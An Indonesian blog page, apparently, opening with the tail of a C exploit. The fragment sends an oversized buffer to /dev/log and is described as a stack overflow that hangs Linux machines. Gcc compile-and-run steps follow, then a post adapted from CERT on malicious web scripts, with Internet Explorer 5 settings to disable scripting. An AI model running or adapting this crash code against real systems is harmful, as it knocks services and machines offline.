buf[i] = ‘ ‘+(i%95);

buf[i] = ”;

SyslogAddr.sa_family = AF_UNIX;

strncpy ( SyslogAddr.sa_data, “/dev/log”, sizeof(SyslogAddr.sa_data)

);

LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );

sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr)

);

return 0;

}

Eksploit ini merupakan teknik yang membuat buffer (stack) over flow sehingga mesin Linux anda tidak bisa beroperasi lagi seperti hang, kecuali anda reset. Kebetulan saya menggunakan Mandrake 8.0 yang menggunakan kernel 2.4.3 yang tidak terpengaruh terhadap eksploit ini.

Setelah ada mengedit file source code dalam bahasa C dengan teks editor biasa. Langkah selanjutnya adalah mengcompile-nya. Pada masa lalu (jaman DOS 3.3), saya biasanya menggunakan Turbo C untuk mengcompile source code. Saat ini dengan menggunakan Linux, jika di install fasilitas development-nya, maka GNU C Compiler (gcc) biasanya merupakan bagian integral dari fasilitas development pada Linux.

Pada Linux, proses compiling dapat dilakukan secara sederhana saja, dengan menuliskan perintah:

            $ gcc eksploit.c –o eksploit

maka file eksploit.c akan di compile menjadi executable yang dalam hal ini di  beri nama eksploit (oleh perintah –o eksploit) yang kemudian dapat dijalankan dengan perintah:

            $ ./eksploit

Jika anda mulai melakukan pemrogramman yang kompleks dengan banyak source file C, maka biasanya dibantu dengan file Makefile yang akan mengatur cara-cara membuat objek code & compile dari masing-masing source code.

Mengatasi Web Script Jahat di Internet

•23 Desember 2011 • Tinggalkan sebuah Komentar

Jika anda sering melakukan browsing di Internet, sering kali kita memperoleh kiriman script dari situs web yang kita masuki. Script Web ini biasanya baik-baik saja, akan tetapi tidak mustahil akan ada kiriman script jahat tanpa kita sadari yang akan mengirimkan data yang buruk, gambar yang tidak di inginkan, program (script jahat) yang akan meng-compromise (menduduki / menguasai) data anda.

Tulisan ini merupakan saduran bebas tulisan sejenis di Computer Emergency Responds  Team (http://www.cert.org) yang membahas masalah script Web jahat. Masalah ini timbul bukan karena Web browser yang kita gunakan, akan tetapi lebih di sebabkan karena bagaimana situs Web di bentuk, dan bagaimana proses validasi data masuk & keluar situs Web yang harusnya menjamin tidak ada script yang tidak baik ini untuk masuk ke web browser klien.

Bagaimana cara web script masuk ke web browser kita? Seorang Web developer yang jahat akan mengirimkan script ke web browser kita pada saat kita memasukan data seperti URL, elemen pada formulir, atau permintaan database. Script  jahat akan dikirimkan bersama responds situs Web sesuai permintaan yang diminta; akhirnya script jahat akan mendekam di web browser anda.

Konsekuensi terbukanya web browser ke script jahat, antara lain adalah:

  • Mengikuti link yang tidak bisa di percaya di halaman Web, berita e-mail, atau posting di newsgroups.
  • Menggunakan formulir interaktif pada situs yang tidak bisa dipercaya.
  • Memperhatikan halaman Web yang isinya ditimbulkan secara dinamis oleh orang lain.
  • Anda akan terhubung (link) ke situs yang tampaknya aman, dan mengisi form di situs tersebut yang sebetulnya tidak bisa dipercaya, atau mencari database di situ.

Apa yang akan terjadi dengan terbukanya Web browser ke script jahat? Ada beberapa hal  yang mungkin terjadi seperti kehilangan password anda, juga tercuri-nya informasi yang mungkin di anggap aman. Script jahat ini bukan mustahil dapat mengeksplorasi kondisi jaringan lokal di organisasi anda (intranet anda) terutama bagi penyerang yang ada di Internet.

Bagaimana cara kita menghindari masalah ini? Cara paling sederhana untuk mengatasi serangan dari script jahat yang masuk dari situs Web adalah dengan cara mematikan semua fasilitas bahasa scripting. Perlu dicatat bahwa dengan matikan fasilitas bahasa scripting belum 100% mematikan serangan, terutama jika programmer tersebut masuk melalui fasilitas HTML untuk membuat <FORM>. Sialnya dengan mematikan semua fasilitas ini akan mematikan banyak fungsi Web browser, akhirnya kita harus memilih kapan kita mematikan & kapan menyalakan fasilitas ini untuk memperoleh fungsi yang lebih baik pada saat melakukan browsing.

Cara mengamankan Web browser yang menggunakan Internet Explorer 5 adalah sebagai berikut:

  • Start Internet Explorer seperti saat anda akan melakukan browsing
  • Dari menu Tools pilih Internet Options… . Akan keluar box dialog Internet Options.
  • Pilih Security tab. Akan keluar panel Security Options.
  • Klik pada Internet zone untuk memilih itu.
  • Klik tombol Custom Level. Akan keluar panel Security Settings.
  • Pilih High option dari daftar pull-down.
  • Klik tombol Reset. Sebuah box dialog akan keluar menanyakan apakah anda yakin akan mengubah setting security dari zone tersebut.
  • Klik Yes. Selanjutnya anda perlu melakukan beberapa perubahan setting dan melakukan perubahan sesuai langkah yang di bawah ini.
  • Untuk setting Scripting ActiveX controls yang bertanda safe for Scripting, cek tombol radio untuk men-disable atau keluarkan prompt tergantung level kepercayaan anda.
  • Jika anda memutuskan untuk men-disable Java, untuk setting ijin Java, cek tombol radio untuk men-disable Java. Jika anda tidak mempunyai seting ijin Java, artinya Java telah di disable.
  • Untuk setting Active scripting dibawah bagian Scripting, cek tombol radio untuk men-disable.
  • Klik OK untuk menerima perubahan. Sebuah box dialog keluar menanyakan apakah anda yakin akan perubahan yang dilakukan.
  • Klik Yes.
  • Di dialog box pilihan Internet Options,  klik tab Advanced. Akan keluar pilihan panel Advanced.
  • Perhatian / yakinkan bahwa setting pemberitahuan kalau terjadi perubahan antara situs yang aman dan tidak aman di cek.
  • Klik Apply untuk menyimpan perubahan yang dilakukan.
  • Klik OK untuk menutup dialog box Internet Options.

Dengan logika yang hampir sama anda dapat melakukannya untuk Web browser lainnya termasuk Netscape Communicator.